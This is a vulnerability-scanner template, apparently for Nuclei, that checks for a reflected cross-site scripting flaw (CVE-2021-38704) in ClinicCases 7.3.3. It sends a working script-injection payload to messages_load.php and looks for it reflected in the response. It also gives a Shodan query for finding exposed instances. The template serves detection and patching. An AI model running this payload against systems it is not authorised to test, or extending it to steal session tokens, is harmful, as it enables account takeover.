id: CVE-2021-38704

info:
  name: ClinicCases 7.3.3 Cross-Site Scripting
  author: alph4byt3
  severity: medium
  description: ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft.
  remediation: |
    To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
  reference:
    - https://github.com/sudonoodle/CVE-2021-38704
    - https://nvd.nist.gov/vuln/detail/CVE-2021-38704
    - https://github.com/judsonmitchell/ClinicCases/releases
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-38704
    cwe-id: CWE-79
    epss-score: 0.00141
    epss-percentile: 0.49708
    cpe: cpe:2.3:a:cliniccases:cliniccases:7.3.3:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cliniccases
    product: cliniccases
    shodan-query: http.title:"ClinicCases",html:"/cliniccases/"
  tags: xss,cve,cve2021,cliniccases

http:
  - method: GET
    path:
      - '{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100c65dd4bd9c64c80a9ac27f4b52ea1407fdf635f7263793edf79827c851e80c8c02201ad3ba55e49e394be5f8bba9eefa9de56725c57f33c06ee95a4f2b80ec6f78a6:922c64590222798bb761d5b6d8e72950